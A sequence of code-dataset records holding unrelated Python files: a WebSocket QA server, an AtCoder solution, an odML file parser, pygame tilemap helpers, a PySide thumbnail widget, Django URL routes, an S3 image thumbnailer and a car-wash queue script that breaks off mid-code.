multiple clients\n\"\"\"\nclass QAService:\n def __init__(self, q):\n self.name = \"\"\n self._q = q\n self._answer = \"\"\n\n def _run_thread(self):\n # Initializes WebSocket for specific IP and PORT number\n server = WebsocketServer(13254, host='0.0.0.0')\n # assigns new_client callback function\n server.set_fn_new_client(self.new_client)\n\n # assigns callback for receving messages from clients\n server.set_fn_message_received(self.message_recieved)\n\n # starts main loop of WebSocket server\n server.run_forever()\n\n def new_client(self, client, server):\n # server.send_message_to_all(\"Hey all, a new client has joined us\")\n print(\"new client has joined\")\n\n def message_recieved(self, client, server, message):\n print(\"=======================================================================================================\")\n print(\"NEW REQUEST FROM CLIENT: {}\".format(client))\n print(\"DATA: {}\".format(message))\n print(\"NUMBER OF TEXT TOKENS: {}\".format(len(message.split())))\n # answer = self.predict_answer(message)\n evt = threading.Event()\n self._q.put((message, evt))\n\n # waits for processing thread to process the message\n evt.wait()\n\n # sends a message to client with processed result\n print(\"Sending message back {}\".format(self._answer))\n server.send_message(client, self._answer)\n\n def set_answer(self, answer):\n # called by message processing thread to set the result\n self._answer = answer\n\n def start_web_server(self):\n # starts separate thread for running WebSocket server\n th = threading.Thread(target=self._run_thread)\n th.start()\n","sub_path":"qa_service.py","file_name":"qa_service.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"272987186","text":"n,m = map(int , input().split())\r\n\r\ne = []\r\n\r\nfor i in range(m):\r\n a,b,c = map(int , input().split())\r\n e.append((a-1,b-1,c)) \r\n\r\nmaxdis = [-float('inf') for i in range(n)]\r\n\r\nmaxdis[0] = 0\r\nmugen = False\r\n\r\nfor i in range(n):\r\n for j in e:\r\n st,gl,cost = j\r\n if (maxdis[gl] < maxdis[st]+cost):\r\n maxdis[gl] = maxdis[st]+cost\r\n if (i >= n-1 and (gl == n-1)): \r\n mugen = True \r\n break\r\nif mugen:\r\n print(\"inf\")\r\n\r\nelse:\r\n print(maxdis[n-1])","sub_path":"Source Codes/AtCoder/abc061/D/4496253.py","file_name":"4496253.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201163207","text":"#!/usr/bin/env python\n\"\"\"\nA generic odML parsing module.\n\nParses odML files and documents.\n\"\"\"\n\nimport datetime\nimport json\nimport sys\nimport yaml\n\nfrom os.path import basename\n\nfrom . import xmlparser\nfrom .dict_parser import DictWriter, DictReader\nfrom ..info import FORMAT_VERSION\nfrom .parser_utils import ParserException\nfrom .parser_utils import SUPPORTED_PARSERS\nfrom .rdf_converter import RDFReader, RDFWriter\nfrom ..validation import Validation\n\ntry:\n unicode = unicode\nexcept NameError:\n unicode = str\n\n\nclass ODMLWriter:\n \"\"\"\n A generic odML document writer, for XML, YAML and JSON.\n\n Usage:\n xml_writer = ODMLWriter(parser='XML')\n xml_writer.write_file(odml_document, filepath)\n \"\"\"\n\n def __init__(self, parser='XML'):\n self.parsed_doc = None # Python dictionary object equivalent\n parser = parser.upper()\n\n if parser not in SUPPORTED_PARSERS:\n raise NotImplementedError(\"'%s' odML parser does not exist!\" % parser)\n\n self.parser = parser\n\n def write_file(self, odml_document, filename):\n # Write document only if it does not contain validation errors.\n validation = Validation(odml_document)\n msg = \"\"\n for err in validation.errors:\n if err.is_error:\n msg += \"\\n\\t- %s %s: %s\" % (err.obj, err.rank, err.msg)\n if msg != \"\":\n msg = \"Resolve document validation errors before saving %s\" % msg\n raise ParserException(msg)\n\n with open(filename, 'w') as file:\n # Add XML header to support odML stylesheets.\n if self.parser == 'XML':\n file.write(xmlparser.XMLWriter.header)\n\n file.write(self.to_string(odml_document))\n\n def to_string(self, odml_document):\n string_doc = ''\n\n if self.parser == 'XML':\n string_doc = unicode(xmlparser.XMLWriter(odml_document))\n elif self.parser == \"RDF\":\n # Use turtle as default output format for now.\n string_doc = RDFWriter(odml_document).get_rdf_str(\"xml\")\n else:\n self.parsed_doc = DictWriter().to_dict(odml_document)\n\n odml_output = {'Document': self.parsed_doc,\n 'odml-version': FORMAT_VERSION}\n\n if self.parser == 'YAML':\n yaml.add_representer(datetime.time, YAMLTimeSerializer)\n string_doc = yaml.dump(odml_output, default_flow_style=False)\n elif self.parser == 'JSON':\n string_doc = json.dumps(odml_output, indent=4,\n cls=JSONDateTimeSerializer)\n\n if sys.version_info.major < 3:\n string_doc = string_doc.encode(\"utf-8\")\n\n return string_doc\n\n\n# Required to serialize datetime.time as string objects\ndef YAMLTimeSerializer(dumper, data):\n return dumper.represent_scalar('tag:yaml.org,2002:str', str(data))\n\n\n# Required to serialize datetime values with JSON.\nclass JSONDateTimeSerializer(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, (datetime.datetime, datetime.date, datetime.time)):\n return str(o)\n\n return json.JSONEncoder.default(self, o)\n\n\nclass ODMLReader:\n \"\"\"\n A reader to parse odML files or strings into odml documents,\n based on the given data exchange format, like XML, YAML, JSON or RDF.\n\n Usage:\n yaml_odml_doc = ODMLReader(parser='YAML').from_file(\"odml_doc.yaml\")\n json_odml_doc = ODMLReader(parser='JSON').from_file(\"odml_doc.json\")\n \"\"\"\n\n def __init__(self, parser='XML', show_warnings=True):\n \"\"\"\n :param parser: odml parser; supported are 'XML', 'JSON', 'YAML' and 'RDF'.\n :param show_warnings: Toggle whether to print warnings to the command line.\n \"\"\"\n self.doc = None # odML document\n self.parsed_doc = None # Python dictionary object equivalent\n parser = parser.upper()\n if parser not in SUPPORTED_PARSERS:\n raise NotImplementedError(\"'%s' odML parser does not exist!\" % parser)\n self.parser = parser\n self.show_warnings = show_warnings\n self.warnings = []\n\n def from_file(self, file, doc_format=None):\n\n if self.parser == 'XML':\n par = xmlparser.XMLReader(ignore_errors=True,\n show_warnings=self.show_warnings)\n self.warnings = par.warnings\n self.doc = par.from_file(file)\n return self.doc\n\n elif self.parser == 'YAML':\n with open(file) as yaml_data:\n try:\n yaml.SafeLoader.add_constructor(\n \"tag:yaml.org,2002:python/unicode\",\n UnicodeLoaderConstructor)\n self.parsed_doc = yaml.safe_load(yaml_data)\n except yaml.parser.ParserError as err:\n print(err)\n return\n\n par = DictReader(show_warnings=self.show_warnings)\n self.doc = par.to_odml(self.parsed_doc)\n # Provide original file name via the in memory document\n self.doc._origin_file_name = basename(file)\n return self.doc\n\n elif self.parser == 'JSON':\n with open(file) as json_data:\n try:\n self.parsed_doc = json.load(json_data)\n except ValueError as err: # Python 2 does not support JSONDecodeError\n print(\"JSON Decoder Error: %s\" % err)\n return\n\n par = DictReader(show_warnings=self.show_warnings)\n self.doc = par.to_odml(self.parsed_doc)\n # Provide original file name via the in memory document\n self.doc._origin_file_name = basename(file)\n return self.doc\n\n elif self.parser == 'RDF':\n if not doc_format:\n raise ValueError(\"Format of the rdf file was not specified\")\n\n self.doc = RDFReader().from_file(file, doc_format)\n return self.doc\n\n def from_string(self, string, doc_format=None):\n\n if self.parser == 'XML':\n self.doc = xmlparser.XMLReader().from_string(string)\n return self.doc\n\n elif self.parser == 'YAML':\n try:\n self.parsed_doc = yaml.safe_load(string)\n except yaml.parser.ParserError as err:\n print(err)\n return\n\n self.doc = DictReader().to_odml(self.parsed_doc)\n return self.doc\n\n elif self.parser == 'JSON':\n try:\n self.parsed_doc = json.loads(string)\n except ValueError as err: # Python 2 does not support JSONDecodeError\n print(\"JSON Decoder Error: %s\" % err)\n return\n\n self.doc = DictReader().to_odml(self.parsed_doc)\n return self.doc\n\n elif self.parser == 'RDF':\n if not doc_format:\n raise ValueError(\"Format of the rdf file was not specified\")\n\n self.doc = RDFReader().from_string(string, doc_format)\n return self.doc\n\n\n# Constructor for PyYAML to load unicode characters\n# Needed only for < Python 3\ndef UnicodeLoaderConstructor(loader, node):\n return node.value\n","sub_path":"odml/tools/odmlparser.py","file_name":"odmlparser.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"463215071","text":"# tilemap.py\n\nimport pygame as pg\nimport pytmx\nfrom settings import *\n\n#HUD functions\ndef draw_player_health(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 20\n fill = pct * BAR_LENGTH\n outline_rect = pg.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pg.Rect(x, y, fill, BAR_HEIGHT)\n if pct > 0.6:\n col = GREEN\n elif pct > 0.3:\n col = YELLOW\n else:\n col = RED\n pg.draw.rect(surf, col, fill_rect)\n pg.draw.rect(surf, WHITE, outline_rect, 2)\n\n# Collision\ndef collide_with_walls(sprite, group, dir):\n if dir == 'x':\n hits = pg.sprite.spritecollide(sprite, group, False, collide_hit_rect)\n if hits:\n if hits[0].rect.centerx > sprite.hit_rect.centerx:\n sprite.pos.x = hits[0].rect.left - sprite.hit_rect.width / 2\n if hits[0].rect.centerx < sprite.hit_rect.centerx:\n sprite.pos.x = hits[0].rect.right + sprite.hit_rect.width / 2\n sprite.vel.x = 0\n sprite.hit_rect.centerx = sprite.pos.x\n if dir == 'y':\n hits = pg.sprite.spritecollide(sprite, group, False, collide_hit_rect)\n if hits:\n if hits[0].rect.centery > sprite.hit_rect.centery:\n sprite.pos.y = hits[0].rect.top - sprite.hit_rect.height / 2\n if hits[0].rect.centery < sprite.hit_rect.centery:\n sprite.pos.y = hits[0].rect.bottom + sprite.hit_rect.height / 2\n sprite.vel.y = 0\n sprite.hit_rect.centery = sprite.pos.y\n\ndef collide_hit_rect(one, two):\n return one.hit_rect.colliderect(two.rect)\n\nclass Map:\n def __init__(self, filename):\n self.data = []\n with open(filename, 'rt') as f:\n for line in f:\n self.data.append(line.strip())\n\n self.tilewidth = len(self.data[0])\n self.tileheight = len(self.data)\n self.width = self.tilewidth * TILESIZE\n self.height = self.tileheight * TILESIZE\n\nclass TiledMap:\n def __init__(self, filename):\n tm = pytmx.load_pygame(filename, pixelalpha=True)\n self.width = tm.width * tm.tilewidth\n self.height = tm.height * tm.tileheight\n self.tmxdata = tm\n\n def render(self, surface):\n ti = self.tmxdata.get_tile_image_by_gid\n for layer in self.tmxdata.visible_layers:\n if isinstance(layer, pytmx.TiledTileLayer):\n for x, y, gid, in layer:\n tile = ti(gid)\n if tile:\n surface.blit(tile, (x * self.tmxdata.tilewidth,\n y * self.tmxdata.tileheight))\n def make_map(self):\n temp_surface= pg.Surface((self.width, self.height))\n self.render(temp_surface)\n return temp_surface\n\nclass Camera:\n def __init__(self, width, height):\n self.camera = pg.Rect(0, 0, width, height)\n self.width = width\n self.height = height\n\n def apply(self, entity):\n return entity.rect.move(self.camera.topleft)\n\n def apply_rect(self, rect):\n return rect.move(self.camera.topleft)\n\n def update(self, target):\n x = -target.rect.centerx + int(WIDTH / 2)\n y = -target.rect.centery + int(HEIGHT / 2)\n\n # limit scrolling to map size\n x = min(0, x) # left\n y = min(0, y) # top\n x = max(-(self.width - WIDTH), x) # right\n y = max(-(self.height - HEIGHT), y) # bottom\n self.camera = pg.Rect(x, y, self.width, self.height)\n","sub_path":"tilemap.py","file_name":"tilemap.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"628048031","text":"\"\"\"Thumbnail classes.\"\"\"\n\nfrom PySide import QtGui\nfrom PySide import QtCore\n\nfrom .helpers import getTextSize\nfrom .exceptions import ThumbnailInsertionError, UnknownFlowError\nfrom .edge import Edge\n\n\n# Currently only affects Thumbnail label placement.\nFLOW_LEFT_TO_RIGHT = \"flow_left_to_right\"\nFLOW_RIGHT_TO_LEFT = \"flow_right_to_left\"\n\nclass EditableLabel(QtGui.QGraphicsTextItem):\n def __init__(self, txt, parent=None):\n super(EditableLabel, self).__init__(txt, parent=parent)\n self.setAcceptHoverEvents(True)\n self.setTextInteractionFlags(True)\n\n def setText(self, txt):\n self.setHtml(txt)\n \n\n\n#class Thumbnail(QtGui.QGraphicsPixmapItem):\nclass Thumbnail(QtGui.QGraphicsItem):\n \"\"\"A Thumbnail is a socket of a Node and can be connected to other Thumbnails.\"\"\"\n\n def __init__(self, **kwargs):\n\n self.path = kwargs.get(\"path\")\n print(\"path............. \" + self.path)\n \n self.pixmap = QtGui.QPixmap(self.path)\n\n \n\n super(Thumbnail, self).__init__(**kwargs)\n \n #super(Thumbnail, self).__init__(self.pixmap)\n\n self.label = QtGui.QLabel()\n \n \n \n self.x = 0\n self.y = 0\n self.w = 10\n self.h = 10\n\n self.margin = 5\n\n\n self.name = \"value\"\n self.displayName = self.name\n self.originalDisplayName = self.name\n\n #self.labelColor = QtGui.QColor(10, 10, 10)\n\n #self.labelColor = QtGui.QColor(127,127,127)\n #self.fillColor = QtGui.QColor(130, 130, 130)\n #self.highlightColor = QtGui.QColor(255, 255, 0)\n\n # Temp store for Edge currently being created.\n #self.newEdge = None\n\n #self.edges = []\n\n #self.setAcceptHoverEvents(True)\n\n def node(self):\n \"\"\"The Node that this Thumbnail belongs to is its parent item.\"\"\"\n return self.parentItem()\n\n def setPos(self, x, y):\n node = self.node()\n scene = node.scene()\n print(\"Setting thumbnail position : \" + str(x) + \", \"+ str(y))\n \n\n def boundingRect(self):\n \"\"\"Return the bounding box of this Thumbnail.\"\"\"\n rect = QtCore.QRect(self.x,\n self.y,\n self.w,\n self.h)\n return rect\n\n def highlight(self, toggle):\n \"\"\"Toggle the highlight color on/off.\n \n Store the old color in a new attribute, so it can be restored.\n \"\"\"\n if toggle:\n self._oldFillColor = self.fillColor\n self.fillColor = self.highlightColor\n else:\n self.fillColor = self._oldFillColor\n\n def paint(self, painter, option, widget):\n \"\"\"Draw the Thumbnail's shape and label.\"\"\"\n bbox = self.boundingRect()\n\n print(\"BBOX -> \" + str(bbox))\n #self.label.setPixmap(self.pixmap)\n \n #self.label.setParentItem(self.node())\n self.node().scene().addPixmap(self.pixmap)\n # Draw a filled rectangle.\n #painter.setPen(QtGui.QPen(QtCore.Qt.NoPen))\n #painter.setBrush(QtGui.QBrush(self.fillColor))\n #painter.drawRect(bbox)\n\n # Draw a text label next to it. Position depends on the flow.\n #textSize = getTextSize(self.displayName, None)#painter=painter)\n #if self.flow == FLOW_LEFT_TO_RIGHT:\n # x = bbox.right() + self.margin\n #elif self.flow == FLOW_RIGHT_TO_LEFT:\n # x = bbox.left() - self.margin - textSize.width()\n #else:\n # raise UnknownFlowError(\n # \"Flow not recognized: {0}\".format(self.flow))\n #y = bbox.bottom()\n\n #lbl = EditableLabel(self.displayName, self.node())\n\n #painter.setPen(QtGui.QPen(self.labelColor))\n #painter.drawText(x, y, self.displayName)\n #painter.drawText(x, y, lbl)\n #print(\"X -> \" + str(x) + \" Y -> \" + str(y))\n \n\n def hoverEnterEvent(self, event):\n \"\"\"Change the Thumbnail's rectangle color.\"\"\"\n self.highlight(True)\n if(isinstance(self, InputThumbnail)):\n self.originalDisplayName = self.displayName\n self.displayName = self.displayName + \" (editing...)\"\n self.node().updateSizeForChildren()\n super(Thumbnail, self).hoverEnterEvent(event)\n\n def hoverLeaveEvent(self, event):\n \"\"\"Change the Thumbnail's rectangle color.\"\"\"\n self.highlight(False)\n if(isinstance(self, InputThumbnail)):\n self.displayName = self.originalDisplayName\n self.node().updateSizeForChildren()\n super(Thumbnail, self).hoverLeaveEvent(event)\n\n def mousePressEvent(self, event):\n \"\"\"Handle Edge creation.\"\"\"\n if event.button() == QtCore.Qt.MouseButton.LeftButton:\n print(\"create edge\")\n\n self.newEdge = Edge()\n self.newEdge.source = self\n self.newEdge.targetPos = event.scenePos()\n self.newEdge.updatePath()\n\n # Make sure this is removed if the user cancels.\n self.addEdge(self.newEdge)\n return\n\n def mouseMoveEvent(self, event):\n \"\"\"Update Edge position when currently creating one.\"\"\"\n if self.newEdge:\n print(\"update edge\")\n self.newEdge.targetPos = event.scenePos()\n self.newEdge.updatePath()\n\n def mouseReleaseEvent(self, event):\n \"\"\"Finish Edge creation (if validations are passed).\n \n TODO: This currently implements some constraints regarding the Thumbnail\n connection logic, for which we should probably have a more\n flexible approach.\n \"\"\"\n if event.button() == QtCore.Qt.MouseButton.LeftButton:\n\n node = self.parentItem()\n scene = node.scene()\n target = scene.itemAt(event.scenePos())\n\n try:\n if self.newEdge and target:\n\n if self.newEdge.source is target:\n raise ThumbnailConnectionError(\n \"Can't connect a Thumbnail to itself.\")\n\n if isinstance(target, Thumbnail):\n\n if type(self) == type(target):\n raise ThumbnailConnectionError(\n \"Can't connect Thumbnails of same type.\")\n\n newConn = set([self, target])\n for edge in self.edges:\n existingConn = set([edge.source, edge.target])\n diff = existingConn.difference(newConn)\n if not diff:\n raise ThumbnailConnectionError(\n \"Connection already exists.\")\n return\n\n self.checkMaxConnections(target)\n\n print(\"finish edge\")\n target.addEdge(self.newEdge)\n self.newEdge.target = target\n self.newEdge.updatePath()\n self.finalizeEdge(self.newEdge)\n self.newEdge = None\n return\n \n else:\n print(\"The other case you just made....\")\n p = event.scenePos()\n print(str(p))\n \n\n raise ThumbnailInsertionError(\n \"Thumbnail did not work.\")\n\n except ThumbnailInsertionError as err:\n print(err)\n # Abort Edge creation and do some cleanup.\n print(\"Showing popup menu...\")\n \n self.removeEdge(self.newEdge)\n self.newEdge = None\n\n \n def finalizeEdge(self, edge):\n \"\"\"This intentionally is a NoOp on the Thumbnail baseclass.\n\n It is meant for subclass Thumbnails to implement special behaviour\n that needs to be considered when connecting two Thumbnails.\n \"\"\"\n pass\n\n def destroy(self):\n \"\"\"Remove this Thumbnail, its Edges and associations.\"\"\"\n print(\"destroy thumbnail:\", self)\n edgesToDelete = self.edges[::] # Avoid shrinking during deletion.\n for edge in edgesToDelete:\n edge.destroy()\n node = self.parentItem()\n if node:\n node.removeThumbnail(self)\n\n self.scene().removeItem(self)\n del self\n","sub_path":"python/qtnodes/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129443581","text":"import logging\nimport os\n\nfrom gensim.models import word2vec\n\nfrom nlp.word2vector.data_utils import load_comment_data, load_couplet_data\n\nCOMMENT_W2V_MODEL_PATH = './nlp/models/word2vec_comment.models'\nCOUPLET_W2V_MODEL_PATH = './nlp/models/word2vec_couplet.models'\n\n\ndef load_word2vector_comment_model():\n if os.path.exists(COMMENT_W2V_MODEL_PATH):\n model = word2vec.Word2Vec.load(COMMENT_W2V_MODEL_PATH)\n else:\n words_list = load_comment_data()\n model = word2vec.Word2Vec(words_list, min_count=1, iter=20)\n model.save(COMMENT_W2V_MODEL_PATH)\n\n\ndef load_word2vector_couplet_model():\n if os.path.exists(COUPLET_W2V_MODEL_PATH):\n model = word2vec.Word2Vec.load(COUPLET_W2V_MODEL_PATH)\n else:\n words_list = load_couplet_data()\n model = word2vec.Word2Vec(words_list, min_count=1, iter=20)\n model.save(COUPLET_W2V_MODEL_PATH)\n return model\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n model = load_word2vector_couplet_model()\n\n print(model.wv.most_similar('夜'))\n","sub_path":"nlp/word2vector/word2vector.py","file_name":"word2vector.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"646567279","text":"# coding=UTF-8\r\nimport requests\r\nimport baidu\r\nimport spider\r\ndef forecast():\r\n a='广州'\r\n web = requests.get('http://wthrcdn.etouch.cn/weather_mini?city='+a)\r\n web=web.json()\r\n data=web['data']['forecast'][0]\r\n day=data['date']\r\n temp1=data['high']\r\n temp2=data['low']\r\n type=data['type']\r\n print(day[-3:])\r\n text=a +day +temp1 + temp2+ type+'今天要上的课是'+str(spider.CourseTable(day[-3:]))\r\n baidu.sound(text)\r\nif(__name__=='__main__'):\r\n forecast()","sub_path":"forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"509574344","text":"from django.conf.urls import url\nfrom app01.views import consultant, teachers\n\nurlpatterns = [\n url(r'^login/', consultant.Login.as_view(), name='login'),\n url(r'^logoff/', consultant.Logoff.as_view(), name='logoff'),\n url(r'^register/', consultant.Register.as_view(), name='register'),\n\n url(r'^customer/', consultant.Customer.as_view(), name='customer'),\n url(r'^customer_query/', consultant.Customer.as_view(), name='customer_query'),\n url(r'^my_customer/', consultant.Customer.as_view(), name='my_customer'),\n url(r'^customer_add/', consultant.CustomerRep.as_view(), name='customer_add'),\n url(r'^customer_rep/(\\d+)', consultant.CustomerRep.as_view(), name='customer_rep'),\n\n url(r'^user_list/', consultant.UserList.as_view(), name='user_list'),\n\n url(r'^consult_record/$', consultant.ConsultRecord.as_view(), name='consult_record'),\n url(r'^consult_record/(?P\\d+)', consultant.ConsultRecord.as_view(), name='consult_record_one'),\n url(r'^consult_record_add/', consultant.ConsultRecordRep.as_view(), name='consult_record_add'),\n url(r'^consult_record_rep/(\\d+)', consultant.ConsultRecordRep.as_view(), name='consult_record_rep'),\n\n url(r'^enrollment/$', consultant.Enrollment.as_view(), name='enrollment'),\n url(r'^enrollment/(?P\\d+)', consultant.Enrollment.as_view(), name='enrollment_one'),\n url(r'^enrollment_add/(?P\\d+)$', consultant.EnrollmentAdd.as_view(), name='enrollment_add'),\n url(r'^enrollment_rep/(\\d+)', consultant.EnrollmentAdd.as_view(), name='enrollment_rep'),\n\n url(r'^classes/$', teachers.Classes.as_view(), name='classes'),\n url(r'^classes_add/', teachers.ClassesAdd.as_view(), name='classes_add'),\n url(r'^classes_rep/(\\d+)', teachers.ClassesAdd.as_view(), name='classes_rep'),\n\n url(r'^course_record/(?P\\d+)$', teachers.CourseRecord.as_view(), name='course_record'),\n url(r'^course_record_add/(?P\\d+)$', teachers.CourseRecordAdd.as_view(), name='course_record_add'),\n url(r'^course_record_rep/(?P\\d+)$', teachers.CourseRecordAdd.as_view(), name='course_record_rep'),\n\n url(r'^study_record_list/(\\d+)$', teachers.StudyRecord.as_view(), name='study_record_list'),\n]\n","sub_path":"app01/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"120327229","text":"import replay\nimport sys\nimport argparse\nimport time\n\n#time speed calculation is based on this article in liquidpedia: https://liquipedia.net/starcraft2/Game_Speed\n#In a replay done on faster (i.e. gamespeed 4), 42.86 in game seconds = 1 real world minute. Speed Factor = 1.4\n#so there is a 0.714 real-world second delay between each in-game second because 1 real-world second / 1.4 = 0.714\n#another way to think about this is that time ticks 71.4% fast in SC2 than in real time.\nTIME_DELAY = 0.01\n\n\n\ndef is_event_with_player_produced_unit(event):\n return (event['_event'] == 'NNet.Replay.Tracker.SUnitBornEvent') and (event['_gameloop'] > 100)\n\nparser = argparse.ArgumentParser(description='Everytime a SC2 unit is produced, a beat is played. This script generates a mp3 file')\nparser.add_argument('replay', type=str, help='path to .SC2Replay')\n\nargs = parser.parse_args()\n\nmy_replay = replay.Replay(args.replay)\ntrackerevents = my_replay.tracker_events()\n\nprint('--> extracting relevant events')\n\nrelevant_events = []\nfor t_event in trackerevents:\n if is_event_with_player_produced_unit(t_event):\n relevant_events.append(t_event)\n\nprint('--> creating audio')\n\n#audio loop\nmax_time = relevant_events[-1]['_gameloop'] + 10\nevent_len = len(relevant_events)\ni = 0\n\nprint(relevant_events[-1]['_gameloop'], relevant_events[-1]['m_unitTypeName'])\n\nfor t in range(max_time):\n event = relevant_events[i]\n\n if event['_gameloop'] == t:\n print(event['m_unitTypeName'])\n i = i + 1\n\n time.sleep(TIME_DELAY)\n \n","sub_path":"rep-to-song.py","file_name":"rep-to-song.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"258999858","text":"from os import environ\nfrom boto.s3.key import Key\nfrom boto.s3.connection import S3Connection\nimport mimetypes\nimport Image\nimport sys\nimport cStringIO\n\nACCESS_KEY = environ['ACCESS_KEY']\nPASS_KEY = environ['PASS_KEY']\nBUCKET = environ['BUCKET']\n\nTHUMBNAIL_SIZE = 128, 128\n\ndef store_in_s3(filename, image):\n conn = S3Connection(ACCESS_KEY, PASS_KEY)\n bucket = conn.create_bucket(BUCKET)\n mime = mimetypes.guess_type(filename)[0]\n k = Key(bucket)\n k.key = filename\n k.set_metadata(\"Content-Type\", mime)\n\n out_bytes = cStringIO.StringIO()\n image.save(out_bytes, mime.split(\"/\")[-1])\n k.set_contents_from_string(out_bytes.getvalue())\n k.set_acl(\"public-read\")\n\ndef read_file(filename):\n name, ext = filename.split('.')\n ext = mimetypes.guess_type(filename)[0].split(\"/\")[-1]\n im = Image.open(filename)\n\n # Store the fullsize image\n store_in_s3(\".\".join((name, ext)), im)\n\n # Store the thumbnail\n thumb = im.copy()\n short_side = min(thumb.size)\n width, height = thumb.size\n left = (width - short_side) / 2\n top = (height - short_side) / 2\n thumb = thumb.crop((left, top, left+short_side, top+short_side))\n thumb.thumbnail(THUMBNAIL_SIZE, Image.ANTIALIAS)\n store_in_s3(name + \"_sm.\" + ext, thumb)\n thumb.save(name + \"_thumb\", ext)\n\n # Process the image to web size\n mid = process_image(im.copy())\n store_in_s3(name + \"_mid.\" + ext, mid)\n mid.save(name + \"_mid\", ext)\n\ndef process_image(im):\n original_width, original_height = [float(x) for x in im.size]\n original_aspect_ratio = original_width / original_height\n target_width, target_height = 1024.0, 768.0\n target_aspect_ratio = target_width / target_height\n\n if original_aspect_ratio < 1:\n # Switch values for portrait images\n target_width, target_height = target_height, target_width\n target_aspect_ratio = target_width / target_height\n\n if original_aspect_ratio > target_aspect_ratio:\n # Process wider images\n cutoff_one_side = \\\n (original_width - (original_height * target_aspect_ratio)) / 2.0\n im = im.crop(( int(cutoff_one_side),\n 0,\n int(original_width - cutoff_one_side),\n int(original_height)))\n else:\n # Process taller images\n cutoff_one_way = \\\n (original_height - (original_width * target_aspect_ratio)) / 2.0\n im2 = im.crop(( 0,\n int(cutoff_one_way),\n int(original_width),\n int(original_height - cutoff_one_way)))\n im2.load()\n\n if (im.size[0] > target_width) or (im.size[1] > target_height):\n im = im.resize((int(target_width), int(target_height)), Image.ANTIALIAS)\n\n return im\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n read_file(filename)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"552621280","text":"import random\nimport json\n\n \nwith open(\"data.json\") as file:\n data = json.load(file)\n\n\nclass MyCode:\n def __init__(self, code=[]):\n self.code = code\n your_letters = 'abcdefghifvwqzxp1234567890'\n for i in range(1, 5):\n x = random.choice(your_letters)\n self.code.append(x)\n self.code = \"\".join(self.code)\n\n\nclass CarType:\n\n def choose_car(self):\n while True:\n res = data['car_type'][0] + \", \" + data['car_type'][1]\n self.JeepSedan = input('\\nWhich of the following types is your car:' + res + ' ')\n self.JeepSedan = self.JeepSedan.upper()\n if self.JeepSedan in data['car_type']:\n return self.JeepSedan\n else:\n print('\\nIncorrect input')\n\n\nclass District:\n \n\n def choose_district(self):\n res_data = data['district'][0] + \", \" + data['district'][1] + \", \" + data['district'][2] + \", \" + data['district'][3]\n\n while True:\n self.district_choice = input('\\nWe have four car-washing companies choose the best for you:' + res_data + ' ')\n self.district_choice = self.district_choice.upper()\n if self.district_choice in data['district']:\n return self.district_choice\n else:\n print('\\nIncorrect input')\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n\n def last(self, data):\n if self.head is None:\n new_node = Node(data)\n new_node.prev = None\n self.head = new_node\n else:\n new_node = Node(data)\n cur = self.head\n while cur.next:\n cur = cur.next\n cur.next = new_node\n new_node.prev = cur\n new_node.next = None\n\n def first(self, data):\n if self.head is None:\n new_node = Node(data)\n new_node.prev = None \n self.head = new_node\n else:\n new_node = Node(data)\n self.head.prev = new_node\n new_node.next = self.head\n self.head = new_node\n new_node.prev = None\n\n def remove_last(self): \n if self.head is not None:\n temp = self.head\n while(temp.next is not None):\n prev = temp\n temp = temp.next\n prev.next = None\n else:\n print('Nothing to remove')\n\n def print_list(self):\n cur = self.head\n while cur:\n print('\\n',cur.data)\n cur = cur.next\n\n\nclass Result:\n\n def check_choice(self):\n\n name = input('Please mention your name ')\n premium_user = input(\"If you want to be the first in the queue you can type (y) Premium Option,Otherwise input (n) \") == 'y'\n res = ''\n dllist = DoublyLinkedList()\n dllist.last('Ani')\n\n if premium_user:\n res = '|Premium Choice + 1000amd'\n dllist.first(name)\n name += ' -- Premium User'\n else: \n dllist.last(name)\n\n MC = MyCode()\n Dist = District.choose_district(self)\n Chose = CarType.choose_car(self)\n\n car_washer = input('Done washing the car ? ') == 'y'\n if car_washer:\n dllist.remove_last()\n dllist.print_list()\n else: \n dllist.print_list()\n\n\n info = {\n 'District':Dist,\n 'Car_choice':Chose,\n 'Code': MC.code,\n 'name': name\n }\n\n file_name = 'information.json'\n with open(file_name,'a') as f:\n json.dump(info,f,indent=2)\n\n\n if Dist == 'ZEYTUN':\n zey_data1 = data['choice_zeytun'][0] \n print(\"\\n\",zey_data1)\n\n if Chose == 'JEEP':\n zey_data2 = data['choice_zeytun'][1]\n print(\"\\n\",zey_data2,MC.code,res)\n\n\n elif Chose == 'SEDAN':\n zey_data3 = data['choice_zeytun'][2]\n print(\"\\n\",zey_data3,MC.code,res)\n\n 